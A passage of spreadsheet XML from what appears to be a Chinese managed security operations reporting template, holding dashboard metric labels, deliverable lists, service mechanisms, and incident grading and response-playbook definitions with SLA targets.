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420" firstSheet="1" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="可视化看板" sheetId="1" r:id="rId1"/>
    <sheet name="数据统计" sheetId="2" r:id="rId2"/>
    <sheet name="运营机制" sheetId="12" r:id="rId3"/>
    <sheet name="资产表" sheetId="10" r:id="rId4"/>
    <sheet name="暴露面" sheetId="13" r:id="rId5"/>
    <sheet name="资产漏洞表" sheetId="5" r:id="rId6"/>
    <sheet name="弱密码" sheetId="9" r:id="rId7"/>
    <sheet name="告警表" sheetId="14" r:id="rId8"/>
    <sheet name="事件表" sheetId="6" r:id="rId9"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">资产表!$A$1:$AJ$2461</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">暴露面!$A$1:$F$13</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">资产漏洞表!$A$1:$W$9455</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="6" hidden="1">弱密码!$A$2:$BA$516</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="7" hidden="1">告警表!$A$1:$AU$1858</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="8" hidden="1">事件表!$A$1:$BD$193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SXF-Admin</author>
    <author>sangfor</author>
  </authors>
  <commentList>
    <comment ref="C1" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t xml:space="preserve">支持输入单个IP/URL、IP范围（格式：192.168.1.1-192.168.1.100）、IP网段（格式：192.168.1.0/24 或 192.168.1.0/255.255.255.0），若录入IP范围或网段，所有必填信息项将会复用到所有录入资产中
</t>
        </r>
      </text>
    </comment>
    <comment ref="D1" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>核心、重要、一般三个级别</t>
        </r>
      </text>
    </comment>
    <comment ref="E1" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>服务内(7*24H)、服务内(5*8H)、服务外三类</t>
        </r>
      </text>
    </comment>
    <comment ref="F1" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>终端、服务器、网络设备、安全设备、物联网设备、防火墙、VPN、WAF、IDPS、蜜罐、扫描器、DNS、代理服务器、堡垒机十四类</t>
        </r>
      </text>
    </comment>
    <comment ref="G1" authorId="1">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>业务责任人和业务责任人邮箱填写状态需要保持一致（都填写或都不填写）</t>
        </r>
      </text>
    </comment>
    <comment ref="H1" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>业务责任人和业务责任人邮箱填写状态需要保持一致（都填写或都不填写）</t>
        </r>
      </text>
    </comment>
    <comment ref="K1" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>在线、离线两种</t>
        </r>
      </text>
    </comment>
    <comment ref="T1" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>仅支持填写“是/否”；手动填写之后，平台将以手动填写的信息为准，不再主动发起请求并覆盖防护信息</t>
        </r>
      </text>
    </comment>
    <comment ref="U1" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>不需要填写，平台将自动根据资产EDR agent状态校正状态信息</t>
        </r>
      </text>
    </comment>
    <comment ref="X1" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>只能由字母，数字，符号组成，域名示例:example.com；url示例:http://localhost.com:80</t>
        </r>
      </text>
    </comment>
    <comment ref="AH1" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t xml:space="preserve">仅支持单个IP </t>
        </r>
      </text>
    </comment>
    <comment ref="AI1" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>输入多个端口，用","隔开，最多支持1000个端口，需要将映射端口和被映射端口两列的单元格格式修改为文本</t>
        </r>
      </text>
    </comment>
    <comment ref="AJ1" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="10"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>输入多个端口，用","隔开，最多支持1000个端口，需要将映射端口和被映射端口两列的单元格格式修改为文本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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="258486" uniqueCount="12236">
  <si>
    <t>注：填充色为浅黄色的单元格需要手动查找数据填充，其余数据从MSSP平台导出底数据后覆盖子表内容，再更新单元格L1和M1自动按照统计周期计算结果；</t>
  </si>
  <si>
    <t>当前时间</t>
  </si>
  <si>
    <t>统计周期</t>
  </si>
  <si>
    <t>P5</t>
  </si>
  <si>
    <t>边界下一代防火墙AF</t>
  </si>
  <si>
    <t>左侧接入组件数量</t>
  </si>
  <si>
    <t>全流量威胁检测与分析组STA</t>
  </si>
  <si>
    <t>端点安全防护软件EDR</t>
  </si>
  <si>
    <t>漏洞扫描组件TSS</t>
  </si>
  <si>
    <t>第三方安全设备</t>
  </si>
  <si>
    <t>P7</t>
  </si>
  <si>
    <t>Q1</t>
  </si>
  <si>
    <t>2025/8/1～2025/10/30</t>
  </si>
  <si>
    <t>Q2</t>
  </si>
  <si>
    <t>2025/11/1～2026/1/31</t>
  </si>
  <si>
    <t>Q3</t>
  </si>
  <si>
    <t>2026/2/1～2026/4/30</t>
  </si>
  <si>
    <t>Q4</t>
  </si>
  <si>
    <t>2026/5/1～2026/7/31</t>
  </si>
  <si>
    <t>《项目启动会PPT》</t>
  </si>
  <si>
    <t>《安全运营报告》--周报</t>
  </si>
  <si>
    <t>交付进度与交付物数量</t>
  </si>
  <si>
    <t>《首次分析与处置报告》</t>
  </si>
  <si>
    <t>《综合分析报告》--月报</t>
  </si>
  <si>
    <t>《漏洞管理举证报告》</t>
  </si>
  <si>
    <t>《安全运营报告》--季报</t>
  </si>
  <si>
    <t>《漏洞清单》</t>
  </si>
  <si>
    <t>《服务资产表》</t>
  </si>
  <si>
    <t>《重要节假日网络安全保障工作简报》</t>
  </si>
  <si>
    <t>《事件跟踪表》</t>
  </si>
  <si>
    <t>《应急响应报告》</t>
  </si>
  <si>
    <t>《暴露面梳理报告》</t>
  </si>
  <si>
    <t>《网络安全态势半月刊》+最新威胁情报</t>
  </si>
  <si>
    <t>《钓鱼场景安全意识海报》</t>
  </si>
  <si>
    <t>P8</t>
  </si>
  <si>
    <t>网络安全事故数</t>
  </si>
  <si>
    <t>主动保护</t>
  </si>
  <si>
    <t>通报数</t>
  </si>
  <si>
    <t>通报问题闭环率</t>
  </si>
  <si>
    <t>事件数</t>
  </si>
  <si>
    <t>事件闭环率</t>
  </si>
  <si>
    <t>事件平均遏制时间</t>
  </si>
  <si>
    <t>7*24</t>
  </si>
  <si>
    <t>中部</t>
  </si>
  <si>
    <t>安全日志数量</t>
  </si>
  <si>
    <t>右侧</t>
  </si>
  <si>
    <t>MSS服务内风险资产数</t>
  </si>
  <si>
    <t>AF防护路径覆盖率</t>
  </si>
  <si>
    <t>XDR总览统计数据</t>
  </si>
  <si>
    <t>日志到告警消减率</t>
  </si>
  <si>
    <t>MSS服务内风险资产数（XDR）</t>
  </si>
  <si>
    <t>服务内告警数</t>
  </si>
  <si>
    <t>探针流量监测覆盖率</t>
  </si>
  <si>
    <t>安全告警数量</t>
  </si>
  <si>
    <t>服务内事件数</t>
  </si>
  <si>
    <t>AES安装覆盖率</t>
  </si>
  <si>
    <t>告警消减率</t>
  </si>
  <si>
    <t>服务内处置率</t>
  </si>
  <si>
    <t>告警自动分析比例</t>
  </si>
  <si>
    <t>安全事件数</t>
  </si>
  <si>
    <t>平均响应时长</t>
  </si>
  <si>
    <t>告警人工分析比例</t>
  </si>
  <si>
    <t>风险资产数</t>
  </si>
  <si>
    <t>MSS服务外风险资产数（XDR）</t>
  </si>
  <si>
    <t>保护对象</t>
  </si>
  <si>
    <t>业务系统数</t>
  </si>
  <si>
    <t>服务外告警数</t>
  </si>
  <si>
    <t>服务器资产数</t>
  </si>
  <si>
    <t>服务外事件数</t>
  </si>
  <si>
    <t>PC资产数</t>
  </si>
  <si>
    <t>服务外处置率</t>
  </si>
  <si>
    <t>P9</t>
  </si>
  <si>
    <t>高危可利用漏洞防护率</t>
  </si>
  <si>
    <t>告警研判率</t>
  </si>
  <si>
    <t>告警平均响应时间</t>
  </si>
  <si>
    <t>威胁实时遏制率</t>
  </si>
  <si>
    <t>防护</t>
  </si>
  <si>
    <t>AF外部攻击拦截数</t>
  </si>
  <si>
    <t>监测</t>
  </si>
  <si>
    <t>XDR安全日志数量</t>
  </si>
  <si>
    <t>EDR防护端点风险数</t>
  </si>
  <si>
    <t>XDR安全告警总数</t>
  </si>
  <si>
    <t>策略检查与优化次数</t>
  </si>
  <si>
    <t>XDR安全事件数</t>
  </si>
  <si>
    <t>高危可利用漏洞防护数</t>
  </si>
  <si>
    <t>MSS通告事件数</t>
  </si>
  <si>
    <t>识别</t>
  </si>
  <si>
    <t>暴露面扫描次数</t>
  </si>
  <si>
    <t>MSS事件平均推送时长</t>
  </si>
  <si>
    <t>资产和漏洞扫描次数</t>
  </si>
  <si>
    <t>响应</t>
  </si>
  <si>
    <t>XDR自动化处置事件数</t>
  </si>
  <si>
    <t>服务资产数</t>
  </si>
  <si>
    <t>MSS处置事件数</t>
  </si>
  <si>
    <t>应急处置事件数</t>
  </si>
  <si>
    <t>高危可利用漏洞数</t>
  </si>
  <si>
    <t>暴露面风险数</t>
  </si>
  <si>
    <t>运营</t>
  </si>
  <si>
    <t>闭环事件工单数</t>
  </si>
  <si>
    <t>闭环漏洞工单数</t>
  </si>
  <si>
    <t>运营周报数</t>
  </si>
  <si>
    <t>运营月报数</t>
  </si>
  <si>
    <t>P11</t>
  </si>
  <si>
    <t>安全事件总数</t>
  </si>
  <si>
    <t>事件平均响应时间</t>
  </si>
  <si>
    <t>事件平均处置时长</t>
  </si>
  <si>
    <t>安全事件类型TOP5</t>
  </si>
  <si>
    <t>渗透框架</t>
  </si>
  <si>
    <t>平均处置时间（分钟）</t>
  </si>
  <si>
    <t>木马</t>
  </si>
  <si>
    <t>代理工具</t>
  </si>
  <si>
    <t>遏制</t>
  </si>
  <si>
    <t>挖矿</t>
  </si>
  <si>
    <t>处置</t>
  </si>
  <si>
    <t>账号安全</t>
  </si>
  <si>
    <t>闭环</t>
  </si>
  <si>
    <t>平均响应时效趋势</t>
  </si>
  <si>
    <t>月份</t>
  </si>
  <si>
    <t>P13</t>
  </si>
  <si>
    <t>服务器资产总数</t>
  </si>
  <si>
    <t>资产类型分布</t>
  </si>
  <si>
    <t>服务器</t>
  </si>
  <si>
    <t>数据概览</t>
  </si>
  <si>
    <t>终端</t>
  </si>
  <si>
    <t>互联网IP/域名数</t>
  </si>
  <si>
    <t>网络设备</t>
  </si>
  <si>
    <t>互联网暴露端口数</t>
  </si>
  <si>
    <t>安全设备</t>
  </si>
  <si>
    <t>资产识别次数</t>
  </si>
  <si>
    <t>物联网设备</t>
  </si>
  <si>
    <t>内网业务区域</t>
  </si>
  <si>
    <t>服务器数量</t>
  </si>
  <si>
    <t>外网业务区域</t>
  </si>
  <si>
    <t>外网服务器资产数量</t>
  </si>
  <si>
    <t>PC终端数量</t>
  </si>
  <si>
    <t>外网域名资产数量</t>
  </si>
  <si>
    <t>网络设备数量</t>
  </si>
  <si>
    <t>web资产数量</t>
  </si>
  <si>
    <t>物联网设备数量</t>
  </si>
  <si>
    <t>非web资产数量</t>
  </si>
  <si>
    <t>MSS服务资产数量</t>
  </si>
  <si>
    <t>登录入口数量</t>
  </si>
  <si>
    <t>P14</t>
  </si>
  <si>
    <t>已闭环外网资产漏洞数</t>
  </si>
  <si>
    <t>管理员弱密码数</t>
  </si>
  <si>
    <t>高危可利用漏洞闭环率</t>
  </si>
  <si>
    <t>漏洞分布</t>
  </si>
  <si>
    <t>总数</t>
  </si>
  <si>
    <t>已闭环数</t>
  </si>
  <si>
    <t>闭环率</t>
  </si>
  <si>
    <t>高危漏洞</t>
  </si>
  <si>
    <t>中危漏洞</t>
  </si>
  <si>
    <t>低危漏洞</t>
  </si>
  <si>
    <t>P15</t>
  </si>
  <si>
    <t>外部攻击日志数量（XDR）</t>
  </si>
  <si>
    <t>攻击来源地域分布top5</t>
  </si>
  <si>
    <t>攻击数量</t>
  </si>
  <si>
    <t>攻击类型top5</t>
  </si>
  <si>
    <t>遭受外部攻击的主机</t>
  </si>
  <si>
    <t>日志数量</t>
  </si>
  <si>
    <t>威胁总览</t>
  </si>
  <si>
    <t>实时威胁告警数量</t>
  </si>
  <si>
    <t>中国 上海市</t>
  </si>
  <si>
    <t>代码注入</t>
  </si>
  <si>
    <t>192.168.22.54（应用服务器）</t>
  </si>
  <si>
    <t>MSS威胁工单数量</t>
  </si>
  <si>
    <t>中国 浙江省</t>
  </si>
  <si>
    <t>信息泄露</t>
  </si>
  <si>
    <t>192.168.22.23（天津堡垒机）</t>
  </si>
  <si>
    <t>威胁工单平均响应时间</t>
  </si>
  <si>
    <t>中国 天津市</t>
  </si>
  <si>
    <t>扫描工具</t>
  </si>
  <si>
    <t>192.168.9.10（资产发现系统默认分组）</t>
  </si>
  <si>
    <t>策略检查</t>
  </si>
  <si>
    <t>安全设备策略检查次数</t>
  </si>
  <si>
    <t>中国 北京市</t>
  </si>
  <si>
    <t>开源和商业应用漏洞</t>
  </si>
  <si>
    <t>192.168.22.55（应用备用服务器）</t>
  </si>
  <si>
    <t>已优化的策略风险数量</t>
  </si>
  <si>
    <t>中国 山东省</t>
  </si>
  <si>
    <t>Web框架漏洞</t>
  </si>
  <si>
    <t>192.168.22.4（天津ssl vpn）</t>
  </si>
  <si>
    <t>最新威胁</t>
  </si>
  <si>
    <t>最新威胁情报数量</t>
  </si>
  <si>
    <t>最新威胁影响资产数</t>
  </si>
  <si>
    <t>威胁运营趋势---XDR平台获取</t>
  </si>
  <si>
    <t>外部攻击数</t>
  </si>
  <si>
    <t>恶意外联数</t>
  </si>
  <si>
    <t>内部横向攻击数</t>
  </si>
  <si>
    <t>告警数</t>
  </si>
  <si>
    <t>有效事件数</t>
  </si>
  <si>
    <t>风险主机数</t>
  </si>
  <si>
    <t>P16</t>
  </si>
  <si>
    <t>重要时期值守次数</t>
  </si>
  <si>
    <t>重要时期安全态势分布</t>
  </si>
  <si>
    <t>日均攻击数</t>
  </si>
  <si>
    <t>防御率</t>
  </si>
  <si>
    <t>概览数据</t>
  </si>
  <si>
    <t>重要时期安全事件数</t>
  </si>
  <si>
    <t>中秋（25/9/15-9/17）</t>
  </si>
  <si>
    <t>业务可用性保障</t>
  </si>
  <si>
    <t>国庆（25/10/1-10/8）</t>
  </si>
  <si>
    <t>元旦（26/1/1-1/3）</t>
  </si>
  <si>
    <t>春节（26/2/10-2/25）</t>
  </si>
  <si>
    <t>P17</t>
  </si>
  <si>
    <t>边界防火墙检出攻击</t>
  </si>
  <si>
    <t>边界防护</t>
  </si>
  <si>
    <t>防火墙自动拦截率</t>
  </si>
  <si>
    <t>防火墙防护路径覆盖率</t>
  </si>
  <si>
    <t>端点防护</t>
  </si>
  <si>
    <t>AES检出端点安全风险</t>
  </si>
  <si>
    <t>AES信任风险次数</t>
  </si>
  <si>
    <t>主机异常风险联动处置</t>
  </si>
  <si>
    <t>agent安装数</t>
  </si>
  <si>
    <t>服务器资产端点覆盖率</t>
  </si>
  <si>
    <t>资产总数</t>
  </si>
  <si>
    <t>平台监测与响应</t>
  </si>
  <si>
    <t>XDR平台全网安全日志</t>
  </si>
  <si>
    <t>XDR月平均日志数</t>
  </si>
  <si>
    <t>聚合识别安全告警</t>
  </si>
  <si>
    <t>XDR月平均告警数</t>
  </si>
  <si>
    <t>智能研判识别安全事件</t>
  </si>
  <si>
    <t>XDR月平均事件数</t>
  </si>
  <si>
    <t>组件异常监控</t>
  </si>
  <si>
    <t>组件离线告警次数</t>
  </si>
  <si>
    <t>组件日志上报异常告警次数</t>
  </si>
  <si>
    <t>组件策略异常告警次数</t>
  </si>
  <si>
    <t>组件自动处置率</t>
  </si>
  <si>
    <t>风险管理</t>
  </si>
  <si>
    <t>类别</t>
  </si>
  <si>
    <t>子类别</t>
  </si>
  <si>
    <t>服务执行机制</t>
  </si>
  <si>
    <t>用户方配合事项</t>
  </si>
  <si>
    <t>执行标准</t>
  </si>
  <si>
    <t>互联网暴露面</t>
  </si>
  <si>
    <t>暴露面分析</t>
  </si>
  <si>
    <t>首次全面梳理
常态化监测扫描，每周轮询扫描一次</t>
  </si>
  <si>
    <t>确认暴露面是否为业务需要，对不需要的暴露面做访问权限收敛</t>
  </si>
  <si>
    <t>每季度/次</t>
  </si>
  <si>
    <t>攻击面分析</t>
  </si>
  <si>
    <t>首次全面梳理外部攻击面及暴露面弱点
常态化监测扫描，每两周周轮询扫描一次</t>
  </si>
  <si>
    <t>对外部暴露面存在的业务弱点进行修复加固</t>
  </si>
  <si>
    <t>每半年/次</t>
  </si>
  <si>
    <t>敏感数据泄露监测</t>
  </si>
  <si>
    <t>采用网络监测手段实时爬取暗网等平台是否存在单位相关的关键字数据信息，检测到后实时告警推送预警</t>
  </si>
  <si>
    <t>对异常数据外泄采取应对措施，降低影响</t>
  </si>
  <si>
    <t>7*24实时预警</t>
  </si>
  <si>
    <t>漏洞管理</t>
  </si>
  <si>
    <t>互联网资产漏洞</t>
  </si>
  <si>
    <t>高危可利用：每季度针对服务器操作系统和应用程序执行一次漏洞扫描，验证漏洞的利用危害和业务影响</t>
  </si>
  <si>
    <t>AF防护，针对AF无法防护的需要用户业务侧修复漏洞；
分发漏洞工单到业务系统维护方，开展漏洞修复和闭环跟进</t>
  </si>
  <si>
    <t>低可利用漏洞：每季度针对服务器操作系统和应用程序执行一次漏洞扫描，整理漏洞优先级</t>
  </si>
  <si>
    <t>针对有条件修复的漏洞定期进行补丁修复；修改系统配置或访问权限降低漏洞被利用的风险</t>
  </si>
  <si>
    <t>内网资产漏洞</t>
  </si>
  <si>
    <t>高危可利用：每季度针对服务器操作系统和应用程序执行一次漏洞扫描，整理漏洞优先级</t>
  </si>
  <si>
    <t>业务弱点</t>
  </si>
  <si>
    <t>管理员弱密码</t>
  </si>
  <si>
    <t>主动探测：定期TSS扫描；
被动监测：实时推送工单，及时修改密码加固</t>
  </si>
  <si>
    <t>对发现的弱密码进行修改，制定/优化应用系统密码规则</t>
  </si>
  <si>
    <t>互联网系统弱密码</t>
  </si>
  <si>
    <t>被动监测：通过访问流量监测，发现后试试告警，通告用户方可及时修改强密码及密码规则；
主动探测：每季度执行一次互联网弱密码扫描</t>
  </si>
  <si>
    <t>内网普通用户弱密码</t>
  </si>
  <si>
    <t>被动监测：通过访问流量监测，发现后试试告警，通告用户方可及时修改强密码及密码规则；</t>
  </si>
  <si>
    <t>每周/次</t>
  </si>
  <si>
    <t>威胁运营</t>
  </si>
  <si>
    <t>重大威胁</t>
  </si>
  <si>
    <t>定义：攻击者对内网发起的有组织，有预谋的持续性网络攻击（如 APT、新型威胁等）
7*24小时持续监测，发现有效威胁实时响应，遏制影响；</t>
  </si>
  <si>
    <t>如发生业务行为命中安全规则被判定为攻击行为，封堵了源IP后造成业务访问异常时，反馈至服务群，解除封锁</t>
  </si>
  <si>
    <t>7*24实时处置</t>
  </si>
  <si>
    <t>一般威胁</t>
  </si>
  <si>
    <t>定义：攻击者发起网络安全攻击，但是对业务未造成任何影响
7*24小时持续监测，发现有效威胁实时响应，遏制影响；</t>
  </si>
  <si>
    <t>威胁预防</t>
  </si>
  <si>
    <t>定期开展安全设备策略/规则库检查，确保安全基础设施有效运行</t>
  </si>
  <si>
    <t>对存在风险的安全策略配合追溯原因和评估改进策略的可行性</t>
  </si>
  <si>
    <t>每月/次</t>
  </si>
  <si>
    <t>闭环管理</t>
  </si>
  <si>
    <t>①抑制：限制攻击或破坏涉及的范围，降低潜在的损失
②调查：充足的举证信息
③溯源：详细完整的入侵路径
④处置：已发现问题的解决
⑤加固：杜绝问题再次发生</t>
  </si>
  <si>
    <t>事件/告警分级定义标准</t>
  </si>
  <si>
    <t>事件类型</t>
  </si>
  <si>
    <t>判断特征</t>
  </si>
  <si>
    <t>事件定级</t>
  </si>
  <si>
    <t>响应与闭环预案</t>
  </si>
  <si>
    <t>威胁及事件等级</t>
  </si>
  <si>
    <t>等级描述</t>
  </si>
  <si>
    <t>等级示例</t>
  </si>
  <si>
    <t>SLA要求</t>
  </si>
  <si>
    <t>闭环要求</t>
  </si>
  <si>
    <t>网络攻击</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>攻击成功</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>（例：Webshell上传成功）</t>
    </r>
  </si>
  <si>
    <t>重大事件</t>
  </si>
  <si>
    <t>抑制：联动AF封堵攻击源IP、隔离主机可疑进程或被上传的文件；
调查：关联日志分析攻击影响范围，对入侵成功的主机上机排查攻击动作痕迹和残余风险；
溯源：上机排查主机日志，结合流量日志还原攻击路径，找到入侵源头
处置：清除主机恶意文件/进程，恢复主机网络权限；
加固：针对入侵源头利用的漏洞点修复加固，加强安全策略配置</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FFC00000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>重大事故</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FFC00000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFC00000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>（对标国家标准I级事件）</t>
    </r>
  </si>
  <si>
    <t>因安全事件造成单位网络较大面积中断或主营业务系统较大面积瘫痪，影响系统重要客户的正常业务工作、对单位造成重大经济损失的或产生较严重不良社会影响：
1、网络较大面积中断：因网络中断，造成单位内半数以上部门不能正常使用一个及以上主营业务系统，持续时间超过 12 小时以上；
2、主营业务系统较大面积瘫痪：因系统主要功能不可用，造成单位内半数以上部门不能正常使用一个及以上主营业务系统，系统瘫痪时间 12 个小时以上。</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1、网络攻击类
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>外部攻击成功</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>（webshell后门上传/远程命令执行/反序列化命令执行/远程漏洞利用成功等）且</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>造成业务中断或关键业务数据丢失，影响重大</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>的
2、病毒木马类
如加密勒索软件/webshell后门/黑链/主机存在恶意命令执行等事件发生，对</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>业务连续性造成恶劣影响或产生勒索赔偿</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>等重大损失的</t>
    </r>
  </si>
  <si>
    <t>启用应急响应机制，工作时间15分钟，非工作时间30分钟之内云端专家进行响应，默认由专家团队进行远程协助解决，如远程无法解决的则采用最快的交通工具，省会2小时内上门处置，省内8小时内上门处置。</t>
  </si>
  <si>
    <t>抑制--&gt;调查--&gt;溯源--&gt;处置--&gt;加固</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>攻击失败</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>（例：外网主机对内网主机发起一对多攻击）</t>
    </r>
  </si>
  <si>
    <t>抑制（处置）：联动AF封堵攻击源IP</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>重大事件</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>（对标国家标准II级和III级事件）</t>
    </r>
  </si>
  <si>
    <t>因安全事件造成单位主营业务系统中断、敏感数据泄密，信息系统发布和传播系统发生篡改，影响系统部分客户的正常业务工作，或者被监管或主管单位通报，对单位造成较小损失或产生较小不良社会影响的。</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>1、网络攻击类</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>1）外部攻击成功</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">（webshell后门上传/远程命令执行/反序列化命令执行/远程漏洞利用成功/其他符合该等级的事件）
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>2）内部横向或内对外攻击成功</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">（RDP暴力破解/系统命令执行/远程命令执行/其他符合该等级的事件）
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">2、病毒木马类
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>1）加密勒索软件/webshell后门/黑链/主机存在恶意命令执行/其他符合该等级的事件</t>
    </r>
  </si>
  <si>
    <t>通告时间：从安全日志分析研判到通告，用时&lt;30min
遏制影响时间：遏制影响时间&lt;1h
准确率：安全事件经过人工确认后，准确率达到99%
闭环率：100%</t>
  </si>
  <si>
    <t>病毒木马</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>感染型病毒</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>（例：勒索病毒感染）</t>
    </r>
  </si>
  <si>
    <t>抑制：联动AF封堵外联目的IP/域名、联动EDR隔离主机可疑文件或主机网络权限
调查：联动EDR执行全盘查杀，关联主机流量侧行为日志调查扩散的影响范围
溯源：结合网络流量日志和主机操作日志，查明病毒文件上传途径
处置：清除主机病毒文件
加固：针对病毒文件上传途径做好安全加固（漏洞修复/加强密码策略/提高人员安全意识）</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FFFFC000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>一般事件</t>
    </r>
    <r>
